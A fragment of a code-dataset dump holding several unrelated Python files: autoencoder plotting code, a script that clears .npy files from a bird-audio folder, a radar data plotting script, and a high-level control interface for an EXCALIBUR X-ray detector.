plt.xlabel(\"Temperature\")\n # plt.ylabel('Magnetization')\n # plt.title('AAE VAE')\n # plt.legend()\n # plt.savefig('../../Desktop/AAE_VAE-Magnetization.png', bbox_inches='tight')\n # plt.show()\n #\n # print(\"Energy Accuracy\")\n # print(Edist)\n # print(mean_energy)\n # print(mean_energy_data)\n # print(var_energy)\n # print(var_energy_data)\n # plt.errorbar(T_vals+1.1,mean_energy,var_energy,color='b',label='Samples')\n # plt.errorbar(T_vals+1.1,mean_energy_data,var_energy_data,color = 'g',label='Data')\n # plt.xlabel(\"Temperature\")\n # plt.ylabel('Energy')\n # plt.title('AAE_VAE')\n # plt.legend()\n # plt.savefig('../../Desktop/AAE_VAE-Energy.png', bbox_inches='tight')\n # plt.show()\n #\n # print(\"Specfic Heat\")\n # plt.plot(T_vals+1.1,(np.array(var_energy)**2)/((T_vals+1.1)**2),color='b',label='Samples')\n # plt.plot(T_vals+1.1,(np.array(var_energy_data)**2)/((T_vals+1.1)**2),color='g',label='Data')\n # plt.ylabel(\"Specific Heat\")\n # plt.xlabel('Temperature')\n # plt.title('AAE_VAE')\n # plt.legend()\n # plt.savefig('../../Desktop/AAE_VAE-Specific Heat.png', bbox_inches='tight')\n # plt.show()\n #\n # print(\"Magnetic Susceptibility\")\n # plt.plot(T_vals+1.1,(np.array(var_magnetization)**2)/(T_vals+1.1),color='b',label='Samples')\n # plt.plot(T_vals+1.1,(np.array(var_magnetization_data)**2)/(T_vals+1.1),color='g',label='Data')\n # plt.ylabel(\"Magnetic Susceptibility\")\n # plt.xlabel('Temperature')\n # plt.title('AAE_VAE')\n # plt.legend()\n # plt.savefig('../../Desktop/AAE_VAE-Magnetic_Susceptibility.png', bbox_inches='tight')\n # plt.show()\n","sub_path":"2 
july/AAE_vae.py","file_name":"AAE_vae.py","file_ext":"py","file_size_in_byte":18528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"513042158","text":"import os\n\nwalk_dir = '/home/werdn/input/bird/train_audio'\n\n\ndef main():\n for root, subdirs, files in os.walk(walk_dir):\n print('--\\nroot = ' + root)\n list_file_path = os.path.join(root, 'my-directory-list.txt')\n print('list_file_path = ' + list_file_path)\n\n with open(list_file_path, 'wb') as list_file:\n for subdir in subdirs:\n print('\\t- subdirectory ' + subdir)\n\n for filename in files:\n file_path = os.path.join(root, filename)\n\n print('\\t- file %s (full path: %s)' % (filename, file_path))\n parts = filename.split(\".\")\n if parts[1] == 'npy':\n os.remove(file_path)\n # with open(file_path, 'rb') as f:\n # f_content = f.read()\n # list_file.write(('The file %s contains:\\n' % filename).encode('utf-8'))\n # list_file.write(f_content)\n # list_file.write(b'\\n')\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"utils/bird/remove_flies.py","file_name":"remove_flies.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"227996283","text":"import matplotlib.pyplot as plt\nfrom netCDF4 import Dataset\nimport glob\nfs=glob.glob('IPHEX_E*20140512*')\nfsKu=glob.glob('IPHEX_H*20140512*Ku*')\nfrom numpy import *\n#l1=[14000,15000]\n#l2=500:1500\n#l3=3000:4000\nfsKu=sorted(fsKu)\nfhKu=Dataset(fsKu[1])\ndbzKu=fhKu['zku'][:,:]\ndbzKum=ma.array(dbzKu,mask=dbzKu<0)\nrngKu=fhKu['range'][:]/1e3\n\ntKu=fhKu['timed'][:]\n\nf=sorted(fs)[1]\nfh=Dataset(f)\ntX=fh['timed'][:]\ndbz=fh['zku'][:,:]\nns=[[0,4000],[4000,8000],[8000,10000],[10000,12000],[12000,14000]]\ndbzm=ma.array(dbz,mask=dbz<0)\nrng=fh['range'][:]\nind=array([1063, 1064, 1065, 1066, 1067, 1068, 1069, 1070, 1071, 1072])\nr1=20-rng/1e3\nind=nonzero(abs(r1)<0.1)\ndn=[800,150,100]\naroll=fh['roll'][:]\nprofsL=[]\nfor ns1,dn1 in zip(ns[:3],dn):\n plt.figure()\n plt.subplot(211)\n plt.pcolormesh(arange(ns1[0],ns1[1]),20-rng/1e3,\\\n dbzm[ns1[0]:ns1[1],:].T,vmin=10,cmap='jet',vmax=55)\n plt.ylim(0,15)\n plt.colorbar()\n dbzKuL=[]\n for k in range(ns1[0],ns1[1]):\n i0=argmin(abs(tKu-tX[k]))\n \n if tKu[i0]>tX[k]:\n i0-=1\n dt=tKu[i0+1]-tKu[i0]\n f=(tX[k]-tKu[i0])/dt\n if dt<0.1:\n dbzKuL.append((1-f)*dbzKu[i0,:]+f*dbzKu[i0+1,:])\n else:\n dbzKuL.append(0*dbzKu[i0+1,:]-99)\n plt.subplot(212)\n dbzKuL=array(dbzKuL)\n dbzKuLm=ma.array(dbzKuL,mask=dbzKuL<0)\n plt.pcolormesh(arange(ns1[0],ns1[1]),20-rngKu,\\\n dbzKuLm[:,:].T,vmin=10,cmap='jet',vmax=55)\n plt.ylim(0,15)\n plt.colorbar()\n for k in range(ns1[0],ns1[1]):\n h1=20-rng[300:1040]/1e3\n h2=20-rngKu.data\n if abs(aroll[k])<1 and dbzm[k,500:1000].max()>42:\n zkuint=interp(h1[::-1].data,h2[130:550][::-1],\\\n dbzKuLm[k-ns1[0],130:550][::-1])[::-1]\n profsL.append([dbz[k,:][300:1040],zkuint])\n for k in range(0):\n plt.figure()\n plt.plot(dbzm[ns1[0]+dn1+k*10,:],20-rng/1e3)\n plt.plot(dbzKuLm[dn1+k*10,:],20-rngKu)\n\n","sub_path":"XRAD/plotXRAD0512_0.py","file_name":"plotXRAD0512_0.py","file_ext":"py","file_size_in_byte":1982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"288694151","text":"\"\"\"\ninterface_wrapper.py - EXCALIBUR high level API for the ODIN server.\n\nAlan Greer, DLS\n\"\"\"\nimport sys\nimport traceback\nimport logging\nimport json\nfrom datetime import datetime\nimport time\nimport threading\nis_py2 = 
sys.version[0] == '2'\nif is_py2:\n import Queue as queue\nelse:\n import queue as queue\n\nfrom excalibur.detector import ExcaliburDetector, ExcaliburDetectorError\nfrom excalibur.calibration_files import DetectorCalibration\nfrom excalibur.definitions import ExcaliburDefinitions\nfrom excalibur.efuse_id_parser import ExcaliburEfuseIDParser\nfrom enum import Enum\nfrom collections import OrderedDict\n\n\n\nclass ExcaliburParameter(OrderedDict):\n def __init__(self, param, value,\n fem=ExcaliburDefinitions.ALL_FEMS, chip=ExcaliburDefinitions.ALL_CHIPS):\n super(ExcaliburParameter, self).__init__()\n self['param'] = param\n self['value'] = value\n self['fem'] = fem\n self['chip'] = chip\n\n def get(self):\n return self.param, self.value, self.fem, self.chip\n\n\nclass ExcaliburReadParameter(OrderedDict):\n def __init__(self, param, fem=ExcaliburDefinitions.ALL_FEMS, chip=ExcaliburDefinitions.ALL_CHIPS):\n super(ExcaliburReadParameter, self).__init__()\n self['param'] = param\n self['fem'] = fem\n self['chip'] = chip\n\n def get(self):\n return self.param, self.fem, self.chip\n\n\nclass ParameterType(Enum):\n \"\"\"Enumeration of all available types\n \"\"\"\n UNKNOWN = 0\n DICT = 1\n LIST = 2\n INT = 3\n DOUBLE = 4\n STRING = 5\n ENUM = 6\n\n\nclass Parameter(object):\n def __init__(self, name, data_type=ParameterType.UNKNOWN, value=None, callback=None, every_time=False):\n self._name = name\n self._datatype = data_type\n self._value = value\n self._callback = callback\n self._every_time = every_time\n\n @property\n def value(self):\n return self.get()['value']\n\n def get(self):\n # Create the dictionary of information\n return_value = {'value': self._value,\n 'type': self._datatype.value\n }\n return return_value\n\n def set_value(self, value, callback=True):\n changed = False\n if self._value != value:\n self._value = value\n changed = True\n if self._callback is not None:\n if callback:\n if self._every_time:\n self._callback(self._name, self._value)\n elif changed:\n self._callback(self._name, self._value)\n\n\nclass EnumParameter(Parameter):\n def __init__(self, name, value=None, allowed_values=None, callback=None, every_time=False):\n super(EnumParameter, self).__init__(name, data_type=ParameterType.ENUM, value=value,\n callback=callback, every_time=every_time)\n self._allowed_values = allowed_values\n\n def get(self):\n # Create the dictionary of information\n return_value = super(EnumParameter, self).get()\n if self._allowed_values is not None:\n return_value['allowed_values'] = self._allowed_values\n return return_value\n\n @property\n def index(self):\n return self.get()['allowed_values'].index(self.value)\n\n\nclass IntegerParameter(Parameter):\n def __init__(self, name, value=None, limits=None, callback=None, every_time=False):\n super(IntegerParameter, self).__init__(name, data_type=ParameterType.INT, value=value,\n callback=callback, every_time=every_time)\n self._limits = limits\n\n def get(self):\n # Create the dictionary of information\n return_value = super(IntegerParameter, self).get()\n if self._limits is not None:\n return_value['limits'] = self._limits\n return return_value\n\n\nclass DoubleParameter(Parameter):\n def __init__(self, name, value=None, limits=None, callback=None, every_time=False):\n super(DoubleParameter, self).__init__(name, data_type=ParameterType.DOUBLE, value=value,\n callback=callback, every_time=every_time)\n self._limits = limits\n\n def get(self):\n # Create the dictionary of information\n return_value = super(DoubleParameter, self).get()\n if 
self._limits is not None:\n return_value['limits'] = self._limits\n return return_value\n\n\nclass StringParameter(Parameter):\n def __init__(self, name, value=None, callback=None, every_time=False):\n super(StringParameter, self).__init__(name, data_type=ParameterType.STRING, value=value,\n callback=callback, every_time=every_time)\n\n\nclass HLExcaliburDetector(ExcaliburDetector):\n \"\"\"Wraps the detector class to provide a high level interface.\n\n \"\"\"\n test_mode = False\n\n STATE_IDLE = 0\n STATE_ACQUIRE = 1\n STATE_CALIBRATING = 2\n\n def __init__(self, fem_connections):\n super(HLExcaliburDetector, self).__init__(fem_connections)\n\n self._fems = range(1, len(fem_connections)+1)\n logging.debug(\"Fem conection IDs: %s\", self._fems)\n\n self._default_status = []\n for fem in self._fems:\n self._default_status.append(None)\n\n # Create the calibration object\n self._cb = DetectorCalibration()\n\n # Create the Excalibur parameters\n self._param = {\n 'api': DoubleParameter('api', 0.1),\n 'config/num_images': IntegerParameter('num_images', 1),\n 'config/exposure_time': DoubleParameter('exposure_time', 1.0),\n 'config/num_test_pulses': IntegerParameter('num_test_pulses', 0),\n 'config/scan_dac_num': IntegerParameter('scan_dac_num', 0),\n 'config/scan_dac_start': IntegerParameter('scan_dac_start', 0),\n 'config/scan_dac_stop': IntegerParameter('scan_dac_stop', 0),\n 'config/scan_dac_step': IntegerParameter('scan_dac_step', 0),\n 'config/test_pulse_enable': EnumParameter('test_pulse_enable',\n ExcaliburDefinitions.FEM_TEST_PULSE_NAMES[0],\n ExcaliburDefinitions.FEM_TEST_PULSE_NAMES),\n 'config/image_mode': EnumParameter('image_mode',\n ExcaliburDefinitions.FEM_IMAGEMODE_NAMES[0],\n ExcaliburDefinitions.FEM_IMAGEMODE_NAMES),\n 'config/operation_mode': EnumParameter('operation_mode',\n ExcaliburDefinitions.FEM_OPERATION_MODE_NAMES[0],\n ExcaliburDefinitions.FEM_OPERATION_MODE_NAMES),\n 'config/lfsr_bypass': EnumParameter('lfsr_bypass',\n ExcaliburDefinitions.FEM_LFSR_BYPASS_MODE_NAMES[0],\n ExcaliburDefinitions.FEM_LFSR_BYPASS_MODE_NAMES),\n 'config/read_write_mode': EnumParameter('read_write_mode',\n ExcaliburDefinitions.FEM_READOUT_MODE_NAMES[0],\n ExcaliburDefinitions.FEM_READOUT_MODE_NAMES),\n 'config/disc_csm_spm': EnumParameter('disc_csm_spm',\n ExcaliburDefinitions.FEM_DISCCSMSPM_NAMES[0],\n ExcaliburDefinitions.FEM_DISCCSMSPM_NAMES),\n 'config/equalization_mode': EnumParameter('equalization_mode',\n ExcaliburDefinitions.FEM_EQUALIZATION_MODE_NAMES[0],\n ExcaliburDefinitions.FEM_EQUALIZATION_MODE_NAMES),\n 'config/trigger_mode': EnumParameter('trigger_mode',\n ExcaliburDefinitions.FEM_TRIGMODE_NAMES[0],\n ExcaliburDefinitions.FEM_TRIGMODE_NAMES),\n 'config/trigger_polarity': EnumParameter('trigger_polarity',\n ExcaliburDefinitions.FEM_TRIGPOLARITY_NAMES[1],\n ExcaliburDefinitions.FEM_TRIGPOLARITY_NAMES),\n 'config/csm_spm_mode': EnumParameter('csm_spm_mode',\n ExcaliburDefinitions.FEM_CSMSPM_MODE_NAMES[0],\n ExcaliburDefinitions.FEM_CSMSPM_MODE_NAMES,\n callback=self.update_calibration),\n 'config/colour_mode': EnumParameter('colour_mode',\n ExcaliburDefinitions.FEM_COLOUR_MODE_NAMES[0],\n ExcaliburDefinitions.FEM_COLOUR_MODE_NAMES),\n 'config/gain_mode': EnumParameter('gain_mode',\n ExcaliburDefinitions.FEM_GAIN_MODE_NAMES[0],\n ExcaliburDefinitions.FEM_GAIN_MODE_NAMES,\n callback=self.hl_set_gain_mode),\n 'config/counter_select': IntegerParameter('counter_select', 0),\n 'config/counter_depth': EnumParameter('counter_depth',\n '12',\n ['1', '6', '12', '24']),\n 
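# NOTE: the calibration-related entries below (e.g. cal_file_root, energy_threshold) register\n            # update_calibration as their callback, so writing them re-loads the calibration files.\n            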
'config/cal_file_root': StringParameter('cal_file_root', '', callback=self.update_calibration),\n 'config/energy_threshold': DoubleParameter('energy_threshold', 0.0, callback=self.update_calibration),\n 'config/udp_file': StringParameter('udp_file', ''),\n 'config/hv_bias': DoubleParameter('hv_bias', 0.0, callback=self.hl_hv_bias_set),\n 'config/lv_enable': IntegerParameter('lv_enable', 0, callback=self.hl_lv_enable, every_time=True),\n 'config/hv_enable': IntegerParameter('hv_enable', 0, callback=self.hl_hv_enable, every_time=True),\n 'config/test_dac_file': StringParameter('test_dac_file', ''),\n 'config/test_mask_file': StringParameter('test_mask_file', ''),\n\n #[\"Normal\",\n # \"Burst\",\n # \"Histogram\",\n # \"DAC Scan\",\n # \"Matrix Read\"])\n }\n self._status = {\n 'calibrating': 0,\n 'calibration': [0] * len(self._fems),\n 'lv_enabled': 0,\n 'hv_enabled': 0,\n 'sensor': {\n 'width': ExcaliburDefinitions.X_PIXELS_PER_CHIP * ExcaliburDefinitions.X_CHIPS_PER_FEM,\n 'height': ExcaliburDefinitions.Y_PIXELS_PER_CHIP *\n ExcaliburDefinitions.Y_CHIPS_PER_FEM * len(self._fems),\n 'bytes': 0\n },\n 'manufacturer': 'DLS/STFC',\n 'model': 'Odin [Excalibur2]',\n 'error': '',\n 'state': HLExcaliburDetector.STATE_IDLE,\n 'fe_lv_enable': [None],\n 'fe_hv_enable': [None],\n 'pwr_p5va_vmon': [None],\n 'pwr_p5vb_vmon': [None],\n 'pwr_p5v_fem00_imon': [None],\n 'pwr_p5v_fem01_imon': [None],\n 'pwr_p5v_fem02_imon': [None],\n 'pwr_p5v_fem03_imon': [None],\n 'pwr_p5v_fem04_imon': [None],\n 'pwr_p5v_fem05_imon': [None],\n 'pwr_p48v_vmon': [None],\n 'pwr_p48v_imon': [None],\n 'pwr_p5vsup_vmon': [None],\n 'pwr_p5vsup_imon': [None],\n 'pwr_humidity_mon': [None],\n 'pwr_air_temp_mon': [None],\n 'pwr_coolant_temp_mon': [None],\n 'pwr_coolant_flow_mon': [None],\n 'pwr_p3v3_imon': [None],\n 'pwr_p1v8_imonA': [None],\n 'pwr_bias_imon': [None],\n 'pwr_p3v3_vmon': [None],\n 'pwr_p1v8_vmon': [None],\n 'pwr_bias_vmon': [None],\n 'pwr_p1v8_imonB': [None],\n 'pwr_p1v8_vmonB': [None],\n 'pwr_coolant_temp_status': [None],\n 'pwr_humidity_status': [None],\n 'pwr_coolant_flow_status': [None],\n 'pwr_air_temp_status': [None],\n 'pwr_fan_fault': [None],\n 'efuseid_c0': [0] * len(self._fems),\n 'efuseid_c1': [0] * len(self._fems),\n 'efuseid_c2': [0] * len(self._fems),\n 'efuseid_c3': [0] * len(self._fems),\n 'efuseid_c4': [0] * len(self._fems),\n 'efuseid_c5': [0] * len(self._fems),\n 'efuseid_c6': [0] * len(self._fems),\n 'efuseid_c7': [0] * len(self._fems),\n 'efuse_match': [0] * len(self._fems)\n }\n logging.debug(\"Status: %s\", self._status)\n self._calibration_status = {\n 'dac': [0] * len(self._fems),\n 'discl': [0] * len(self._fems),\n 'disch': [0] * len(self._fems),\n 'mask': [0] * len(self._fems),\n 'thresh': [0] * len(self._fems)\n }\n\n self._executing_updates = True\n self._read_efuse_ids = False\n self._acquiring = False\n self._frames_acquired = 0\n self._hw_frames_acquired = 0\n self._acq_frame_count = 0\n self._acq_exposure = 0.0\n self._acq_start_time = datetime.now()\n self._acq_timeout = 0.0\n self._comms_lock = threading.RLock()\n self._param_lock = threading.RLock()\n self._fast_update_time = datetime.now()\n self._medium_update_time = datetime.now()\n self._slow_update_time = datetime.now()\n self._startup_time = datetime.now()\n self._frame_start_count = 0\n self._frame_count_time = None\n self._calibration_required = True\n self._moly_humidity_counter = 0\n\n # Temporary 24 bit mode setup\n # TODO: Remove this once 24 bit mode has been implemented within the firmware\n self._24bit_mode = False\n 
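# Until then, 24-bit frames are assembled in software via the 'command/24bit_acquire' path (hl_do_24bit_acquisition).\n        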
self._24bit_acquiring = False\n self._24bit_params = None\n self._counter_select = 0\n self._acquisition_loops = 0\n # End of 24 bit mode\n\n if self.test_mode is False:\n # Perform a slow read\n self.slow_read()\n self._lv_toggle_required = False\n with self._param_lock:\n if self._status['lv_enabled'] == 0:\n # We have started up with the lv not enabled so toggle in case of detector power cycle\n self._lv_toggle_required = True\n self._status_thread = threading.Thread(target=self.status_loop)\n self._status_thread.start()\n # Create the command handling thread\n self._command_lock = threading.Lock()\n self._command_queue = queue.Queue()\n self._command_thread = threading.Thread(target=self.command_loop)\n self._command_thread.start()\n self.init_hardware_values()\n\n def init_hardware_values(self):\n gain_mode = self._param['config/gain_mode']\n self.hl_set_gain_mode('config/gain_mode', gain_mode.value)\n\n def hl_set_gain_mode(self, name, value):\n with self._comms_lock:\n # Initialise the detector parameters\n write_params = []\n gain_mode = self._param['config/gain_mode']\n logging.info(' Setting ASIC gain mode to {} '.format(gain_mode.value))\n write_params.append(ExcaliburParameter('mpx3_gainmode', [[gain_mode.index]]))\n self.hl_write_params(write_params)\n self.update_calibration(name, value)\n\n def hl_load_udp_config(self, name, filename):\n logging.debug(\"Loading UDP configuration [{}] from file {}\".format(name, filename))\n\n try:\n with open(filename) as config_file:\n udp_config = json.load(config_file)\n except IOError as io_error:\n logging.error(\"Failed to open UDP configuration file: {}\".format(io_error))\n self.set_error(\"Failed to open UDP configuration file: {}\".format(io_error))\n return\n except ValueError as value_error:\n logging.error(\"Failed to parse UDP json config: {}\".format(value_error))\n self.set_error(\"Failed to parse UDP json config: {}\".format(value_error))\n return\n\n source_data_addr = []\n source_data_mac = []\n source_data_port = []\n dest_data_port_offset = []\n\n for idx, fem in enumerate(udp_config['fems']):\n source_data_addr.append(fem['ipaddr'])\n source_data_mac.append(fem['mac'])\n source_data_port.append(fem['port'])\n dest_data_port_offset.append(fem['dest_port_offset']\n )\n logging.debug(\n 'FEM {idx:d} | '\n 'ip: {ipaddr:16s} mac: {mac:s} port: {port:5d} offset: {dest_port_offset:d}'.format(\n idx=idx, **fem)\n )\n\n udp_params = []\n num_fems = len(self._fems)\n # Append per-FEM UDP source parameters, truncating to number of FEMs present in system\n udp_params.append(ExcaliburParameter(\n 'source_data_addr', [[addr] for addr in source_data_addr[:num_fems]],\n ))\n udp_params.append(ExcaliburParameter(\n 'source_data_mac', [[mac] for mac in source_data_mac[:num_fems]],\n ))\n udp_params.append(ExcaliburParameter(\n 'source_data_port', [[port] for port in source_data_port[:num_fems]]\n ))\n udp_params.append(ExcaliburParameter(\n 'dest_data_port_offset',\n [[offset] for offset in dest_data_port_offset[:num_fems]]\n ))\n\n # These configurations need to be nested once each each for [Detector[FEM[Chip]]]\n if 'all_fems' in udp_config['nodes'].keys():\n # We need to duplicate the same configuration to all FEMs\n dest_data_addr = [[[]]]\n dest_data_mac = [[[]]]\n dest_data_port = [[[]]]\n for dest_idx, dest in enumerate(udp_config['nodes']['all_fems']):\n dest_data_addr[0][0].append(dest['ipaddr'])\n dest_data_mac[0][0].append(dest['mac'])\n dest_data_port[0][0].append(int(dest['port']))\n\n logging.debug(\n 'Node {node:d} | '\n 
'ip: {ipaddr:16s} mac: {mac:s} port: {port:5d}'.format(\n node=dest_idx, **dest)\n )\n else:\n fems = [fem['name'] for fem in udp_config['fems']]\n if all(fem in udp_config['nodes'].keys() for fem in fems):\n # Each FEM needs a different configuration\n dest_data_addr = [[[]] for _ in self._fems]\n dest_data_mac = [[[]] for _ in self._fems]\n dest_data_port = [[[]] for _ in self._fems]\n for fem_idx, fem_key in enumerate(fems):\n for dest_idx, dest in enumerate(udp_config['nodes'][fem_key]):\n dest_data_addr[fem_idx][0].append(dest['ipaddr'])\n dest_data_mac[fem_idx][0].append(dest['mac'])\n dest_data_port[fem_idx][0].append(int(dest['port']))\n\n logging.debug(\n 'FEM {fem:d} Node {node:d} | '\n 'ip: {ipaddr:16s} mac: {mac:s} port: {port:5d}'.format(\n fem=fem_idx, node=dest_idx, **dest)\n )\n else:\n message = \"Failed to parse UDP json config.\" \\\n \"Node config must contain a config for each entry in fems or \" \\\n \"one config with the key 'all_fems'.\\n\" \\\n \"Fems: {}\\n\" \\\n \"Node Config Keys: {}\".format(fems, udp_config['nodes'].keys())\n logging.error(message)\n self.set_error(message)\n return\n\n # Append the UDP destination parameters, noting [[[ ]]] indexing as they are common for\n # all FEMs and chips - there must be a better way to do this\n udp_params.append(ExcaliburParameter(\n 'dest_data_addr', dest_data_addr\n ))\n udp_params.append(ExcaliburParameter(\n 'dest_data_mac', dest_data_mac\n ))\n udp_params.append(ExcaliburParameter(\n 'dest_data_port', dest_data_port\n ))\n\n farm_mode_enable = udp_config['farm_mode']['enable']\n farm_mode_num_dests = udp_config['farm_mode']['num_dests']\n\n # Append the farm mode configuration parameters\n udp_params.append(ExcaliburParameter('farm_mode_enable', [[farm_mode_enable]]))\n udp_params.append(ExcaliburParameter('farm_mode_num_dests', [[farm_mode_num_dests]]))\n\n # Write all the parameters to system\n logging.debug('Writing UDP configuration parameters to system')\n self.hl_write_params(udp_params)\n logging.debug('UDP configuration complete')\n\n def shutdown(self):\n self._executing_updates = False\n self.queue_command(None)\n\n def set_calibration_status(self, fem, status, area=None):\n if area is not None:\n self._calibration_status[area][fem-1] = status\n else:\n for area in ['dac', 'discl', 'disch', 'mask', 'thresh']:\n self._calibration_status[area][fem - 1] = status\n\n logging.debug(\"Calibration: %s\", self._calibration_status)\n bit = 0\n calibration_bitmask = 0\n for area in ['dac', 'discl', 'disch', 'mask', 'thresh']:\n calibration_bitmask += (self._calibration_status[area][fem - 1] << bit)\n bit += 1\n if calibration_bitmask == 0x1F:\n calibration_bitmask += (1 << bit)\n\n self._status['calibration'][fem-1] = calibration_bitmask\n\n def hl_manual_dac_calibration(self, filename):\n logging.debug(\"Manual DAC calibration requested: %s\", filename)\n for fem in self._fems:\n self.set_calibration_status(fem, 0, 'dac')\n self._cb.manual_dac_calibration(self._fems, filename)\n self.download_dac_calibration()\n logging.debug(\"Status: %s\", self._status)\n\n def hl_test_mask_calibration(self, filename):\n logging.debug(\"Test mask file requested: %s\", filename)\n for fem in self._fems:\n self.set_calibration_status(fem, 0, 'mask')\n self._cb.manual_mask_calibration(self._fems, filename)\n self.download_test_masks()\n logging.debug(\"Status: %s\", self._status)\n\n def update_calibration(self, name, value):\n logging.debug(\"Update calibration requested due to %s updated to %s\", name, value)\n if 
(datetime.now() - self._startup_time).total_seconds() < 10.0:\n # update_calibration requested too early so flag for an update as soon as possible\n self._calibration_required = True\n logging.debug(\"Too early in initialisation to calibrate, queued...\")\n else:\n lv_enabled = 0\n with self._param_lock:\n lv_enabled = self._status['lv_enabled']\n if lv_enabled == 1:\n try:\n self._status['calibrating'] = 1\n self._status['state'] = HLExcaliburDetector.STATE_CALIBRATING\n logging.info(\"Calibrating now...\")\n # Reset all calibration status values prior to loading a new calibration\n for fem in self._fems:\n self.set_calibration_status(fem, 0)\n if self._param['config/cal_file_root'].value != '':\n self._cb.set_file_root(self._param['config/cal_file_root'].value)\n self._cb.set_csm_spm_mode(self._param['config/csm_spm_mode'].index)\n self._cb.set_gain_mode(self._param['config/gain_mode'].index)\n self._cb.set_energy_threshold(self._param['config/energy_threshold'].value)\n self._cb.load_calibration_files(self._fems)\n self.download_dac_calibration()\n self.download_pixel_calibration()\n logging.debug(\"Status: %s\", self._status)\n else:\n logging.debug(\"No calibration root supplied\")\n self._status['calibrating'] = 0\n self._status['state'] = HLExcaliburDetector.STATE_IDLE\n except Exception as ex:\n # If any exception occurs during calibration reset the status item\n self._status['calibrating'] = 0\n self._status['state'] = HLExcaliburDetector.STATE_IDLE\n # Set the error message\n self.set_error(str(ex))\n else:\n logging.debug(\"Not updating calibration as LV is not enabled\")\n\n def get_chip_ids(self, fem_id):\n # Return either the default chip IDs or reversed chip IDs depending on the FEM\n # ID. TODO: \n chip_ids = ExcaliburDefinitions.FEM_DEFAULT_CHIP_IDS\n if fem_id & 1 != 1:\n chip_ids = reversed(chip_ids)\n return chip_ids\n\n def download_dac_calibration(self):\n dac_params = []\n\n for (dac_name, dac_param) in self._cb.get_dac(1).dac_api_params():\n logging.debug(\"%s %s\", dac_name, dac_param)\n dac_vals = []\n for fem in self._fems:\n logging.debug(\"Downloading FEM # {}\".format(fem))\n #fem_vals = [self._cb.get_dac(fem).dacs(fem, chip_id)[dac_name] for chip_id in self.get_chip_ids(fem)]\n fem_vals = [self._cb.get_dac(fem).dacs(fem, chip_id)[dac_name] for chip_id in ExcaliburDefinitions.FEM_DEFAULT_CHIP_IDS]\n dac_vals.append(fem_vals)\n\n dac_params.append(ExcaliburParameter(dac_param, dac_vals,\n fem=self._fems, chip=ExcaliburDefinitions.FEM_DEFAULT_CHIP_IDS))\n\n dac_params.append(ExcaliburParameter('mpx3_dacsense', [[0]],\n fem=self._fems, chip=ExcaliburDefinitions.FEM_DEFAULT_CHIP_IDS))\n\n # Write all the parameters to system\n logging.debug('Writing DAC configuration parameters to system {}'.format(str(dac_params)))\n with self._comms_lock:\n self.hl_write_params(dac_params)\n time.sleep(1.0)\n # Now send the command to load the DAC configuration\n self.hl_do_command('load_dacconfig')\n\n for fem in self._fems:\n self.set_calibration_status(fem, 1, 'dac')\n self.set_calibration_status(fem, 1, 'thresh')\n\n def download_pixel_masks(self):\n pixel_params = []\n mpx3_pixel_masks = []\n logging.debug(\"Generating mpx3_pixel_mask...\")\n for fem in self._fems:\n chip_ids = self.get_chip_ids(fem)\n fem_vals = [self._cb.get_mask(fem)[chip-1].pixels for chip in chip_ids]\n mpx3_pixel_masks.append(fem_vals)\n pixel_params.append(ExcaliburParameter('mpx3_pixel_mask', mpx3_pixel_masks,\n fem=self._fems, chip=ExcaliburDefinitions.FEM_DEFAULT_CHIP_IDS))\n\n # Write all the 
parameters to system\n with self._comms_lock:\n self.hl_write_params(pixel_params)\n time.sleep(1.0)\n # Send the command to load the pixel configuration\n self.hl_do_command('load_pixelconfig')\n\n for fem in self._fems:\n self.set_calibration_status(fem, 1, 'mask')\n\n def download_test_masks(self):\n chip_ids = ExcaliburDefinitions.FEM_DEFAULT_CHIP_IDS\n pixel_params = []\n mpx3_pixel_masks = []\n mpx3_pixel_mask = [0] * ExcaliburDefinitions.FEM_PIXELS_PER_CHIP\n mpx3_pixel_discl = [0] * ExcaliburDefinitions.FEM_PIXELS_PER_CHIP\n mpx3_pixel_disch = [0] * ExcaliburDefinitions.FEM_PIXELS_PER_CHIP\n logging.debug(\"Generating mpx3_pixel_test...\")\n for fem in self._fems:\n fem_vals = [self._cb.get_mask(fem)[chip-1].pixels for chip in chip_ids]\n mpx3_pixel_masks.append(fem_vals)\n pixel_params.append(ExcaliburParameter('mpx3_pixel_mask', [[mpx3_pixel_mask]],\n fem=self._fems, chip=chip_ids))\n pixel_params.append(ExcaliburParameter('mpx3_pixel_discl', [[mpx3_pixel_discl]],\n fem=self._fems, chip=chip_ids))\n pixel_params.append(ExcaliburParameter('mpx3_pixel_disch', [[mpx3_pixel_disch]],\n fem=self._fems, chip=chip_ids))\n pixel_params.append(ExcaliburParameter('mpx3_pixel_test', mpx3_pixel_masks,\n fem=self._fems, chip=chip_ids))\n\n # Write all the parameters to system\n with self._comms_lock:\n self.hl_write_params(pixel_params)\n time.sleep(1.0)\n\n # Send the command to load the pixel configuration\n self.hl_do_command('load_pixelconfig')\n\n for fem in self._fems:\n self.set_calibration_status(fem, 1, 'mask')\n\n def download_pixel_calibration(self):\n #chip_ids = ExcaliburDefinitions.FEM_DEFAULT_CHIP_IDS\n pixel_params = []\n mpx3_pixel_masks = []\n # Write all the parameters to system\n logging.debug(\"Writing pixel parameters to hardware...\")\n\n logging.debug(\"Generating mpx3_pixel_mask...\")\n for fem in self._fems:\n chip_ids = self.get_chip_ids(1)\n fem_vals = [self._cb.get_mask(fem)[chip-1].pixels for chip in chip_ids]\n mpx3_pixel_masks.append(fem_vals)\n pixel_params.append(ExcaliburParameter('mpx3_pixel_mask', mpx3_pixel_masks,\n fem=self._fems, chip=ExcaliburDefinitions.FEM_DEFAULT_CHIP_IDS))\n\n with self._comms_lock:\n self.hl_write_params(pixel_params)\n\n time.sleep(1.0)\n\n # Send the command to load the pixel configuration\n logging.debug(\"Sending the load_pixelconfig command...\")\n self.hl_do_command('load_pixelconfig')\n\n for fem in self._fems:\n self.set_calibration_status(fem, 1, 'mask')\n\n pixel_params = []\n mpx3_pixel_discl = []\n logging.debug(\"Generating mpx3_pixel_discl...\")\n for fem in self._fems:\n chip_ids = self.get_chip_ids(1)\n fem_vals = [self._cb.get_discL(fem)[chip-1].pixels for chip in chip_ids]\n mpx3_pixel_discl.append(fem_vals)\n pixel_params.append(ExcaliburParameter('mpx3_pixel_discl', mpx3_pixel_discl,\n fem=self._fems, 